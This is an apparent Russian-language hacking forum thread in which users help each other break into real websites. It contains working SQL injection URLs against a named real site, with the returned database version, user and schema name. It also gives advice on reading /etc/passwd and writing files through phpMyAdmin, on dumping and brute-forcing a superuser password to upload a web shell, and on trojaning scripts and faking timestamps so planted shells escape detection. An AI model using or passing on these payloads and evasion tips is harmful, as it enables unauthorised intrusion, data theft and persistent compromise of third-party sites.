Ваши вопросы по уязвимостям.

мысль не уловил)
до апдейта дело не дойдет, если 1й селект вернёт ошибку. а строка инъукции которую я передам втавляется одновременно и в 1 селект и во 2й апдейт. Вот и не получается мне так написать, что бы и селект не ругнулся и апдейт что нибудь нужное проапдейтил.
Я хорошо подумал, перед тем как тут этот бред писать

Мне не нужен хеш админа, я про него ни слова не сказал) там и хешей то нет наверно. И цель у меня не сайт взломать, чисто спортивный интерес+ очень сомнительная вероятность подзаработать. Это не форум не портал, а простенькая браузерная игра.

 

Если хочешь что бы помог - пиши в асю - 4000840, постараюсь.

 

в phpmyadmin если есть доступк обычного юзера, можно как-то смотреть phpinfo или что-то подобное?

phpmyadmin 3.3.2deb1

 

да, phpinfo.php лежит в корне phpmyadmin`a

 

(( белая страница. неважно. нашел уже путь. а теперь проблема. у директрорий стойт 777 права но мускл юзер не может писать/читсть (((( почему? ведь /etc/passwd читает

 

rootmd

скинь код ошибки

 

когда пытаюсь читать файл - ничего. когда писать - Errcode 13

 

"chmod 1777" тебе спасет, но кажется у тебя нет прав на выполнение каманд в обалочке.
попробуй в другие папки...

 

в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер

 

с чего ты взял что там чмод 777 ? 13 ошибка выдает именно то что неты прав на ззапись в данную папку, файл_прив проверял у юзверя? ди унде ешть уэй ?

 

я имел ввиду папки, которые видны из веб

спроведливый вопрос.

rootmd

это когда phpmyadmin стал показывать chmod?

 

Народ, чем брутить SQl inj вида
1'+and+'1'='1

Вроде есть тулзы для брута через substring()? кинте в лс плиз

 

я знаю что там chmod 777 потому-что юзеры могут залить картинки там.

 

не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал

 

хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер

 

1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..

 

eclipse
http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
версия как бы намекае

 

http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--
Version 4.1.22-Max
Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net
DB db1081176_stiga_table_tennis
так что брути таблы...
upd
~d0s~ опередил )

 

Что за скрипт умет находить шеллы?
И что можно сделать что бы не детектил..

Заливаю на сайт шелл , на следующий день его нет.
В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))

 

админ дебил попался значить ))
протроянь скрипты и не забудь про команду touch =)